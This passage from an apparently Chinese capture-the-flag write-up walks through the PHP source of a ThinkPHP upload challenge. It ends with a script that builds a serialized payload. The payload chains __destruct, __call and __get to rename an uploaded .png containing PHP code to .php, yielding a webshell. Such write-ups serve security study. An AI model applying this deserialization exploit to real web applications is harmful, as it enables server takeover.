class="hljs-comment">//&#x4E0A;&#x4F20;&#x56FE;&#x7247;</span></span><br><span class="line">            }<span class="hljs-keyword">else</span>{</span><br><span class="line">                <span class="hljs-keyword">$this</span>-&gt;error(<span class="hljs-string">&apos;Forbidden type!&apos;</span>, url(<span class="hljs-string">&apos;../index&apos;</span>));</span><br><span class="line">            }</span><br><span class="line">        }<span class="hljs-keyword">else</span>{</span><br><span class="line">            <span class="hljs-keyword">$this</span>-&gt;error(<span class="hljs-string">&apos;Unknow file type!&apos;</span>, url(<span class="hljs-string">&apos;../index&apos;</span>)); </span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">update_img</span><span class="hljs-params">()</span></span>{</span><br><span class="line">        $user_info=db(<span class="hljs-string">&apos;user&apos;</span>)-&gt;where(<span class="hljs-string">&quot;ID&quot;</span>,<span class="hljs-keyword">$this</span>-&gt;checker-&gt;profile[<span class="hljs-string">&apos;ID&apos;</span>])-&gt;find();  </span><br><span class="line">        <span class="hljs-keyword">if</span>(<span class="hljs-keyword">empty</span>($user_info[<span class="hljs-string">&apos;img&apos;</span>]) &amp;&amp; <span class="hljs-keyword">$this</span>-&gt;img){ </span><br><span class="line">            <span class="hljs-keyword">if</span>(db(<span class="hljs-string">&apos;user&apos;</span>)-&gt;where(<span class="hljs-string">&apos;ID&apos;</span>,$user_info[<span class="hljs-string">&apos;ID&apos;</span>])-&gt;data([<span class="hljs-string">&quot;img&quot;</span>=&gt;addslashes(<span class="hljs-keyword">$this</span>-&gt;img)])-&gt;update()){ </span><br><span class="line">                <span class="hljs-keyword">$this</span>-&gt;update_cookie(); </span><br><span class="line">                <span class="hljs-keyword">$this</span>-&gt;success(<span class="hljs-string">&apos;Upload img successful!&apos;</span>, url(<span class="hljs-string">&apos;../home&apos;</span>));</span><br><span class="line">            }<span class="hljs-keyword">else</span>{</span><br><span class="line">                <span class="hljs-keyword">$this</span>-&gt;error(<span class="hljs-string">&apos;Upload file failed!&apos;</span>, url(<span class="hljs-string">&apos;../index&apos;</span>));</span><br><span class="line">            }</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">update_cookie</span><span class="hljs-params">()</span></span>{   </span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;checker-&gt;profile[<span class="hljs-string">&apos;img&apos;</span>]=<span class="hljs-keyword">$this</span>-&gt;img; </span><br><span class="line">        cookie(<span class="hljs-string">&quot;user&quot;</span>,base64_encode(serialize(<span class="hljs-keyword">$this</span>-&gt;checker-&gt;profile)),<span class="hljs-number">3600</span>);  </span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">ext_check</span><span class="hljs-params">()</span></span>{    </span><br><span class="line">        $ext_arr=explode(<span class="hljs-string">&quot;.&quot;</span>,<span class="hljs-keyword">$this</span>-&gt;filename);  </span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;ext=end($ext_arr);   </span><br><span class="line">        <span class="hljs-keyword">if</span>(<span class="hljs-keyword">$this</span>-&gt;ext==<span class="hljs-string">&quot;png&quot;</span>){  </span><br><span class="line">            <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;</span><br><span class="line">        }<span class="hljs-keyword">else</span>{</span><br><span class="line">            <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__get</span><span class="hljs-params">($name)</span></span></span><br><span class="line"><span class="hljs-function">    </span>{</span><br><span class="line">        <span class="hljs-keyword">return</span> <span class="hljs-keyword">$this</span>-&gt;except[$name]; </span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__call</span><span class="hljs-params">($name, $arguments)</span>  </span></span><br><span class="line"><span class="hljs-function">    </span>{</span><br><span class="line">        <span class="hljs-keyword">if</span>(<span class="hljs-keyword">$this</span>-&gt;{$name}){</span><br><span class="line">            <span class="hljs-keyword">$this</span>-&gt;{<span class="hljs-keyword">$this</span>-&gt;{$name}}($arguments);</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">}</span><br></pre></td></tr></table></figure>

<p>&#x505A;&#x9898;&#x7684;&#x65F6;&#x5019;&#x4E3A;&#x4E86;&#x5E2E;&#x81EA;&#x5DF1;&#x7406;&#x6E05;&#x695A;&#x6E90;&#x7801;&#x903B;&#x8F91;&#xFF0C;&#x5C1D;&#x8BD5;&#x628A;&#x6BCF;&#x4E00;&#x4E2A;&#x8BED;&#x53E5;&#x90FD;&#x6253;&#x4E0A;&#x6CE8;&#x91CA;&#xFF0C;&#x7ED3;&#x679C;&#x8FD8;&#x662F;&#x6CA1;&#x627E;&#x5230;&#x91CD;&#x70B9;&#x3002;</p>
<p>&#x7531;&#x4E8E;&#x6700;&#x91CD;&#x8981;&#x7684;&#x5C31;&#x662F;&#x56FE;&#x7247;&#x4E0A;&#x4F20;&#x7684;&#x51FD;&#x6570;&#xFF0C;&#x76F4;&#x63A5;&#x6765;&#x770B;&#xFF1A;</p>
<p>upload_img()&#x51FD;&#x6570;&#xFF0C;&#x5F53;&#x6709;&#x56FE;&#x7247;&#x4E0A;&#x4F20;&#x65F6;&#xFF0C;&#x5B83;&#x4F1A;&#x7ECF;&#x8FC7;&#x4EE5;&#x4E0B;&#x51E0;&#x4E2A;&#x6B65;&#x9AA4;&#xFF1A;</p>
<ol>
<li>&#x5224;&#x65AD;&#x662F;&#x5426;&#x767B;&#x5F55;&#x6210;&#x529F;</li>
<li>&#x5F53;&#x6587;&#x4EF6;&#x4E0D;&#x4E3A;&#x7A7A;&#x65F6;&#xFF0C;&#x4F1A;&#x8D4B;&#x503C;&#x4E00;&#x4E2A;&#x53D8;&#x91CF;filename_tmp&#x4E3A;&#x539F;&#x56FE;&#x7247;&#x5730;&#x5740;&#xFF0C;filename&#x4E3A;&#x539F;&#x56FE;&#x7247;&#x540D;&#x7684;md5&#x52A0;&#x5BC6;&#x503C;+&#x201D;.png&#x201D;&#xFF0C;&#x5E76;&#x8C03;&#x7528;&#x4E00;&#x4E2A;&#x51FD;&#x6570;&#x6765;&#x5224;&#x65AD;&#x662F;&#x5426;&#x6210;&#x529F;&#x4FEE;&#x6539;filename&#x3002;</li>
<li>&#x5728;&#x5224;&#x65AD;&#x6210;&#x529F;&#x4FEE;&#x6539;filename&#x4E3A;.png&#x540E;&#x7F00;&#x540E;&#xFF0C;&#x5C31;&#x4F1A;&#x539F;&#x56FE;&#x7247;&#x540D;filename_tmp&#x4FEE;&#x6539;&#x4E3A;.png&#x540E;&#x7F00;&#x7684;filename&#x3002;&#x5E76;&#x5220;&#x9664;&#x539F;&#x6765;&#x7684;&#x56FE;&#x7247;&#x3002;</li>
<li>&#x66F4;&#x65B0;&#x6570;&#x636E;&#x5E93;&#x5185;&#x7528;&#x6237;&#x4FE1;&#x606F;&#x4E0E;cookie</li>
</ol>
<p>&#x5E76;&#x4E14;&#xFF0C;&#x6E90;&#x7801;&#x7684;&#x6700;&#x540E;&#x8FD8;&#x6709;&#x4E24;&#x4E2A;php&#x9B54;&#x672F;&#x65B9;&#x6CD5;&#xFF0C;<code>__get(),__call()</code></p>
<ul>
<li><p>&#x8BFB;&#x53D6;&#x4E0D;&#x53EF;&#x8BBF;&#x95EE;&#x5C5E;&#x6027;&#x7684;&#x503C;&#x65F6;&#xFF0C;<code>__get()</code> &#x4F1A;&#x88AB;&#x8C03;&#x7528;&#x3002;&#x8FD4;&#x56DE;except[$&#x88AB;&#x8C03;&#x7528;&#x7684;&#x5C5E;&#x6027;]&#x7684;&#x503C;</p>
</li>
<li><p>&#x5728;&#x5BF9;&#x8C61;&#x4E2D;&#x8C03;&#x7528;&#x4E00;&#x4E2A;&#x4E0D;&#x53EF;&#x8BBF;&#x95EE;&#x65B9;&#x6CD5;&#x65F6;&#xFF0C;<code>__call()</code> &#x4F1A;&#x88AB;&#x8C03;&#x7528;&#x3002;</p>
<pre><code>&#x5176;&#x4E2D;&#xFF1A;`$this-&gt;{$this-&gt;{$name}}($arguments);`&#x6BD4;&#x8F83;&#x7ED5;&#xFF0C;

&#x6211;&#x4EEC;&#x8BBE;A&#x4E3A;&#x6240;&#x8C03;&#x7528;&#x7684;&#x4E0D;&#x53EF;&#x8BBF;&#x95EE;&#x7684;&#x65B9;&#x6CD5;&#x540D;&#x3002;B&#x4E3A;&#x8C03;&#x7528;&#x65B9;&#x6CD5;&#x65F6;&#x6240;&#x8D4B;&#x503C;&#x7684;&#x53C2;&#x6570;&#xFF0C;C&#x4E3A;&#x4E00;&#x4E2A;&#x548C;A&#x4E3A;&#x4E00;&#x4E2A;&#x540D;&#x5B57;&#x7684;&#x53D8;&#x91CF;&#x3002;D&#x4E3A;&#x53D8;&#x91CF;C&#x7684;&#x503C;&#x3002;

&#x90A3;&#x4E48;&#x8FD9;&#x4E2A;&#x8BED;&#x53E5;&#x5C31;&#x4F1A;&#x8C03;&#x7528;&#x8FD9;&#x4E2A;&#x51FD;&#x6570;&#xFF1A;D(B)
</code></pre></li>
</ul>
<p>&#x4ECE;&#x8FD9;&#x91CC;&#x6765;&#x770B;&#xFF0C;&#x9898;&#x76EE;&#x7684;&#x89E3;&#x9898;&#x65B9;&#x6CD5;&#x5C31;&#x6BD4;&#x8F83;&#x660E;&#x4E86;&#x4E86;&#xFF0C;&#x5C31;&#x662F;&#x901A;&#x8FC7;&#x6784;&#x9020;&#x4E00;&#x4E2A;&#x5E8F;&#x5217;&#x5316;&#x7684;payload&#xFF0C;&#x7ED5;&#x8FC7;&#x6216;&#x8005;&#x4FEE;&#x6539;&#x4E0A;&#x4F20;&#x7684;&#x56FE;&#x7247;&#x540E;&#x7F00;&#x540D;&#x4E3A;.php&#x3002;</p>
<p><strong>Register.php</strong></p>
<p>&#x8D1F;&#x8D23;&#x6CE8;&#x518C;&#x7684;&#x9875;&#x9762;</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line"><span class="hljs-keyword">namespace</span> <span class="hljs-title">app</span>\<span class="hljs-title">web</span>\<span class="hljs-title">controller</span>;</span><br><span class="line"><span class="hljs-keyword">use</span> <span class="hljs-title">think</span>\<span class="hljs-title">Controller</span>;</span><br><span class="line"></span><br><span class="line"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Register</span> <span class="hljs-keyword">extends</span> <span class="hljs-title">Controller</span></span></span><br><span class="line"><span class="hljs-class"></span>{</span><br><span class="line">    <span class="hljs-keyword">public</span> $checker;</span><br><span class="line">    <span class="hljs-keyword">public</span> $registed;</span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span><span class="hljs-params">()</span></span></span><br><span class="line"><span class="hljs-function">    </span>{</span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;checker=<span class="hljs-keyword">new</span> Index();</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">register</span><span class="hljs-params">()</span></span></span><br><span class="line"><span class="hljs-function">    </span>{</span><br><span class="line">        <span class="hljs-keyword">if</span> (<span class="hljs-keyword">$this</span>-&gt;checker) {</span><br><span class="line">            <span class="hljs-keyword">if</span>(<span class="hljs-keyword">$this</span>-&gt;checker-&gt;login_check()){</span><br><span class="line">                $curr_url=<span class="hljs-string">&quot;http://&quot;</span>.$_SERVER[<span class="hljs-string">&apos;HTTP_HOST&apos;</span>].$_SERVER[<span class="hljs-string">&apos;SCRIPT_NAME&apos;</span>].<span class="hljs-string">&quot;/home&quot;</span>;</span><br><span class="line">                <span class="hljs-keyword">$this</span>-&gt;redirect($curr_url,<span class="hljs-number">302</span>);</span><br><span class="line">                <span class="hljs-keyword">exit</span>();</span><br><span class="line">            }</span><br><span class="line">        }</span><br><span class="line">        <span class="hljs-keyword">if</span> (!<span class="hljs-keyword">empty</span>(input(<span class="hljs-string">&quot;post.username&quot;</span>)) &amp;&amp; !<span class="hljs-keyword">empty</span>(input(<span class="hljs-string">&quot;post.email&quot;</span>)) &amp;&amp; !<span class="hljs-keyword">empty</span>(input(<span class="hljs-string">&quot;post.password&quot;</span>))) {</span><br><span class="line">            $email = input(<span class="hljs-string">&quot;post.email&quot;</span>, <span class="hljs-string">&quot;&quot;</span>, <span class="hljs-string">&quot;addslashes&quot;</span>);</span><br><span class="line">            $password = input(<span class="hljs-string">&quot;post.password&quot;</span>, <span class="hljs-string">&quot;&quot;</span>, <span class="hljs-string">&quot;addslashes&quot;</span>);</span><br><span class="line">            $username = input(<span class="hljs-string">&quot;post.username&quot;</span>, <span class="hljs-string">&quot;&quot;</span>, <span class="hljs-string">&quot;addslashes&quot;</span>);</span><br><span class="line">            <span class="hljs-keyword">if</span>(<span class="hljs-keyword">$this</span>-&gt;check_email($email)) {</span><br><span class="line">                <span class="hljs-keyword">if</span> (<span class="hljs-keyword">empty</span>(db(<span class="hljs-string">&quot;user&quot;</span>)-&gt;where(<span class="hljs-string">&quot;username&quot;</span>, $username)-&gt;find()) &amp;&amp; <span class="hljs-keyword">empty</span>(db(<span class="hljs-string">&quot;user&quot;</span>)-&gt;where(<span class="hljs-string">&quot;email&quot;</span>, $email)-&gt;find())) {</span><br><span class="line">                    $user_info = [<span class="hljs-string">&quot;email&quot;</span> =&gt; $email, <span class="hljs-string">&quot;password&quot;</span> =&gt; md5($password), <span class="hljs-string">&quot;username&quot;</span> =&gt; $username];</span><br><span class="line">                    <span class="hljs-keyword">if</span> (db(<span class="hljs-string">&quot;user&quot;</span>)-&gt;insert($user_info)) {</span><br><span class="line">                        <span class="hljs-keyword">$this</span>-&gt;registed = <span class="hljs-number">1</span>;</span><br><span class="line">                        <span class="hljs-keyword">$this</span>-&gt;success(<span class="hljs-string">&apos;Registed successful!&apos;</span>, url(<span class="hljs-string">&apos;../index&apos;</span>));</span><br><span class="line">                    } <span class="hljs-keyword">else</span> {</span><br><span class="line">                        <span class="hljs-keyword">$this</span>-&gt;error(<span class="hljs-string">&apos;Registed failed!&apos;</span>, url(<span class="hljs-string">&apos;../index&apos;</span>));</span><br><span class="line">                    }</span><br><span class="line">                } <span class="hljs-keyword">else</span> {</span><br><span class="line">                    <span class="hljs-keyword">$this</span>-&gt;error(<span class="hljs-string">&apos;Account already exists!&apos;</span>, url(<span class="hljs-string">&apos;../index&apos;</span>));</span><br><span class="line">                }</span><br><span class="line">            }<span class="hljs-keyword">else</span>{</span><br><span class="line">                <span class="hljs-keyword">$this</span>-&gt;error(<span class="hljs-string">&apos;Email illegal!&apos;</span>, url(<span class="hljs-string">&apos;../index&apos;</span>));</span><br><span class="line">            }</span><br><span class="line">        } <span class="hljs-keyword">else</span> {</span><br><span class="line">            <span class="hljs-keyword">$this</span>-&gt;error(<span class="hljs-string">&apos;Something empty!&apos;</span>, url(<span class="hljs-string">&apos;../index&apos;</span>));</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">check_email</span><span class="hljs-params">($email)</span></span>{</span><br><span class="line">        $pattern = <span class="hljs-string">&quot;/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,})$/&quot;</span>;</span><br><span class="line">        preg_match($pattern, $email, $matches);</span><br><span class="line">        <span class="hljs-keyword">if</span>(<span class="hljs-keyword">empty</span>($matches)){</span><br><span class="line">            <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;</span><br><span class="line">        }<span class="hljs-keyword">else</span>{</span><br><span class="line">            <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span><span class="hljs-params">()</span></span></span><br><span class="line"><span class="hljs-function">    </span>{</span><br><span class="line">        <span class="hljs-keyword">if</span>(!<span class="hljs-keyword">$this</span>-&gt;registed){</span><br><span class="line">            <span class="hljs-keyword">$this</span>-&gt;checker-&gt;index();</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>

<p>&#x524D;&#x9762;&#x4E00;&#x90E8;&#x5206;&#x90FD;&#x662F;&#x5BF9;&#x89E3;&#x9898;&#x6CA1;&#x4EC0;&#x4E48;&#x592A;&#x5927;&#x7528;&#x5904;&#x3002;</p>
<p>&#x770B;&#x6700;&#x540E;&#x7684;&#x4E00;&#x4E2A;&#x65B9;&#x6CD5;&#xFF0C;&#x5728;&#x7C7B;&#x521B;&#x5EFA;&#x5B8C;&#x6BD5;&#x4E4B;&#x540E;&#x6240;&#x89E6;&#x53D1;&#xFF0C;&#x8FD9;&#x91CC;$this-&gt;checker&#x8C03;&#x7528;&#x4E86;index()&#xFF0C;&#x540E;&#x9762;&#x53EF;&#x4EE5;&#x5229;&#x7528;&#x8FD9;&#x91CC;&#x6765;&#x6784;&#x9020;payload&#x3002;</p>
<h2 id="&#x6839;&#x636E;payload&#x6765;&#x770B;&#x89E3;&#x9898;&#x7684;&#x601D;&#x8DEF;"><a href="#&#x6839;&#x636E;payload&#x6765;&#x770B;&#x89E3;&#x9898;&#x7684;&#x601D;&#x8DEF;" class="headerlink" title="&#x6839;&#x636E;payload&#x6765;&#x770B;&#x89E3;&#x9898;&#x7684;&#x601D;&#x8DEF;"></a>&#x6839;&#x636E;payload&#x6765;&#x770B;&#x89E3;&#x9898;&#x7684;&#x601D;&#x8DEF;</h2><p>&#x751F;&#x6210;Payload&#x7684;&#x811A;&#x672C;:</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line"><span class="hljs-keyword">namespace</span> <span class="hljs-title">app</span>\<span class="hljs-title">web</span>\<span class="hljs-title">controller</span>;</span><br><span class="line"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Register</span></span>{</span><br><span class="line">  <span class="hljs-keyword">public</span> $checker;</span><br><span class="line">  <span class="hljs-keyword">public</span> $registed=<span class="hljs-number">0</span>;</span><br><span class="line">  <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span><span class="hljs-params">($check)</span></span>{</span><br><span class="line">    <span class="hljs-keyword">$this</span>-&gt;checker=$check;</span><br><span class="line">  }</span><br><span class="line">}</span><br><span class="line"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Profile</span></span>{</span><br><span class="line">  <span class="hljs-keyword">public</span> $except = <span class="hljs-keyword">array</span>(<span class="hljs-string">&apos;index&apos;</span>=&gt;<span class="hljs-string">&apos;upload_img&apos;</span>);</span><br><span class="line">  <span class="hljs-keyword">public</span> $ext = <span class="hljs-number">1</span>;</span><br><span class="line">  <span class="hljs-keyword">public</span> $filename_tmp = <span class="hljs-string">&quot;./upload/98acc62aa02eda032d1caed497ce72a0/2b4ec354e9c2540ed9bc584cec08c9c0.png&quot;</span>;</span><br><span class="line">  <span class="hljs-keyword">public</span> $filename=<span class="hljs-string">&quot;./upload/98acc62aa02eda032d1caed497ce72a0/2b4ec354e9c2540ed9bc584cec08c9c0.php&quot;</span>;</span><br><span class="line">}</span><br><span class="line">$a=<span class="hljs-keyword">new</span> Register(<span class="hljs-keyword">new</span> Profile());</span><br><span class="line"><span class="hljs-keyword">echo</span> base64_encode(serialize($a));</span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>&#x5728;&#x770B;&#x4E86;payload&#x4E4B;&#x540E;&#xFF0C;&#x6211;&#x6574;&#x7406;&#x4E86;&#x4E00;&#x4E0B;&#x6211;&#x81EA;&#x5DF1;&#x7684;&#x601D;&#x8DEF;&#xFF1A;</p>
<p>profile.php&#x91CC;&#x7684;upload_img&#x51FD;&#x6570;&#x4E2D;&#x6709;&#x4E00;&#x5904;&#x590D;&#x5236;&#x56FE;&#x7247;&#x5230;&#x65B0;&#x5730;&#x5740;&#xFF0C;&#x5E76;&#x5220;&#x9664;&#x539F;&#x6765;&#x56FE;&#x7247;&#x7684;&#x8BED;&#x53E5;&#xFF1A;</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">@copy(<span class="hljs-keyword">$this</span>-&gt;filename_tmp, <span class="hljs-keyword">$this</span>-&gt;filename);       <span class="hljs-comment">//&#x5C06;&#x8001;&#x56FE;&#x7247;&#x7684;&#x5730;&#x5740;&#x6539;&#x4E3A;&#x4FEE;&#x6539;&#x540E;&#x7684;&#x5730;&#x5740;&#x3002;</span></span><br><span class="line">@unlink(<span class="hljs-keyword">$this</span>-&gt;filename_tmp);              <span class="hljs-comment">//&#x5220;&#x9664;</span></span><br></pre></td></tr></table></figure>

<p>&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x5229;&#x7528;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#xFF0C;&#x5C06;filename_tmp&#x8D4B;&#x503C;&#x4E3A;.png&#x540E;&#x7F00;&#xFF0C;&#x5C06;filename&#x8D4B;&#x503C;&#x4E3A;.php&#x540E;&#x7F00;&#x3002;</p>
<p>&#x8FD9;&#x91CC;&#x5C31;&#x4F1A;&#x5C06;.png&#x540E;&#x7F00;&#x7684;&#x56FE;&#x7247;&#x4FEE;&#x6539;&#x4E3A;.php&#x5E76;&#x628A;&#x539F;&#x6765;&#x540E;&#x7F00;&#x4E3A;.png&#x7684;&#x56FE;&#x7247;&#x5220;&#x9664;&#x3002;&#x8FD9;&#x6837;&#x5C31;&#x53EF;&#x4EE5;&#x5728;&#x56FE;&#x7247;&#x4E2D;&#x5199;&#x5165;&#x4E00;&#x53E5;&#x8BDD;&#x8FDB;&#x800C;getshell&#x3002;</p>
<p>&#x800C;&#x8981;&#x91CD;&#x5B9A;&#x4E49;&#x8FD9;&#x4E24;&#x4E2A;&#x53D8;&#x91CF;&#xFF0C;&#x6211;&#x4EEC;&#x5C31;&#x5F97;&#x8C03;&#x7528;upload_img&#x8FD9;&#x4E2A;&#x51FD;&#x6570;&#x5E76;&#x4E14;&#x7ED5;&#x8FC7;&#x4FEE;&#x6539;&#x540E;&#x7F00;&#x540D;&#x548C;&#x5224;&#x65AD;&#x662F;&#x5426;&#x5DF2;&#x7ECF;&#x4FEE;&#x6539;&#x6210;&#x529F;&#x8FD9;&#x4E24;&#x4E2A;if&#x8BED;&#x53E5;&#x3002;</p>
<p>&#x5F53;&#x6211;&#x4EEC;&#x8FD8;&#x672A;&#x4E0A;&#x4F20;&#x56FE;&#x7247;&#x65F6;&#xFF0C;<code>if(!empty($_FILES))</code>&#x662F;&#x76F4;&#x63A5;&#x53EF;&#x4EE5;&#x7ED5;&#x8FC7;&#x7684;&#xFF0C;&#x8FD9;&#x6837;&#x5C31;&#x4E0D;&#x4F1A;&#x6267;&#x884C;ext_check()&#x8FD9;&#x4E2A;&#x51FD;&#x6570;&#x3002;&#x6211;&#x4EEC;&#x518D;&#x5229;&#x7528;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x5C06;$ext&#x8D4B;&#x503C;&#x4E3A;1&#x3002;&#x5C31;&#x53EF;&#x4EE5;&#x7ED5;&#x8FC7;&#x8FD9;&#x4E24;&#x4E2A;if&#x8BED;&#x53E5;&#x4E86;&#x3002;</p>
<p>&#x90A3;&#x4E48;&#x95EE;&#x9898;&#x6765;&#x4E86;&#xFF0C;&#x600E;&#x4E48;&#x8C03;&#x7528;upload_img&#x8FD9;&#x4E2A;&#x51FD;&#x6570;&#x5462;&#xFF1F;&#x6211;&#x4EEC;&#x77E5;&#x9053;&#xFF0C;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x662F;&#x4E0D;&#x80FD;&#x591F;&#x76F4;&#x63A5;&#x8C03;&#x7528;&#x7C7B;&#x91CC;&#x9762;&#x7684;&#x51FD;&#x6570;&#x7684;&#x3002;</p>
<p>&#x8FD8;&#x8BB0;&#x5F97;&#x524D;&#x9762;&#x7684;&#x4E24;&#x4E2A;&#x9B54;&#x672F;&#x65B9;&#x6CD5;&#x5417;&#xFF1F;</p>
<p>&#x4ECE;payload&#x811A;&#x672C;&#x5F53;&#x4E2D;&#x770B;&#xFF0C;&#x6211;&#x4EEC;&#x5C06;$this-&gt;checker&#x8D4B;&#x503C;&#x4E3A;Profile&#x8FD9;&#x4E2A;&#x7C7B;&#x3002;</p>
<p>&#x9875;&#x9762;Register.php&#x5728;&#x8C03;&#x7528;$this-&gt;checker&#x65F6;&#x7684;&#x8BED;&#x53E5;&#x4E3A;&#xFF1A;</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span><span class="hljs-params">()</span></span></span><br><span class="line"><span class="hljs-function"></span>{</span><br><span class="line">    <span class="hljs-keyword">if</span>(!<span class="hljs-keyword">$this</span>-&gt;registed){</span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;checker-&gt;index();</span><br><span class="line">    }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>

<p>&#x8FD9;&#x91CC;&#x8C03;&#x7528;&#x4E86;$this-&gt;checker-&gt;index();&#x4E5F;&#x5C31;&#x662F;&#x4ECE;Profile&#x7C7B;&#x4E2D;&#x8C03;&#x7528;&#x4E86;index()&#xFF0C;&#x800C;Profile&#x7C7B;&#x4E2D;&#x5E76;&#x6CA1;&#x6709;index()&#x8FD9;&#x4E2A;&#x51FD;&#x6570;&#x3002;</p>
<p>&#x6240;&#x4EE5;&#x8FD9;&#x91CC;&#x5C31;&#x4F1A;&#x89E6;&#x53D1;&#x5230;&#x9B54;&#x672F;&#x65B9;&#x6CD5;&#x4E2D;&#x7684;<code>__call()</code></p>
<p>&#x5728;call&#x65B9;&#x6CD5;&#x4E2D;&#xFF0C;&#x4F1A;&#x8C03;&#x7528;&#x540D;&#x4E3A;&#x53D8;&#x91CF;index&#x7684;&#x503C;&#x7684;&#x65B9;&#x6CD5;&#x3002;&#x800C;Profile&#x7C7B;&#x4E2D;&#x6CA1;&#x6709;index&#x8FD9;&#x4E2A;&#x53D8;&#x91CF;&#xFF0C;&#x6240;&#x4EE5;&#x53C8;&#x4F1A;&#x89E6;&#x53D1;<code>__get()</code>&#x8FD9;&#x4E2A;&#x9B54;&#x672F;&#x65B9;&#x6CD5;&#x3002;</p>
<p>&#x5728;get&#x65B9;&#x6CD5;&#x4E2D;&#xFF0C;&#x4F1A;&#x8FD4;&#x56DE;except[&#x2018;index&#x2019;]&#x7684;&#x503C;&#xFF0C;&#x6240;&#x4EE5;&#x6211;&#x4EEC;&#x5728;&#x6784;&#x9020;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x65F6;&#x5C31;&#x5C06;&#x5176;&#x8D4B;&#x503C;&#x4E3A;upload_img&#x3002;</p>
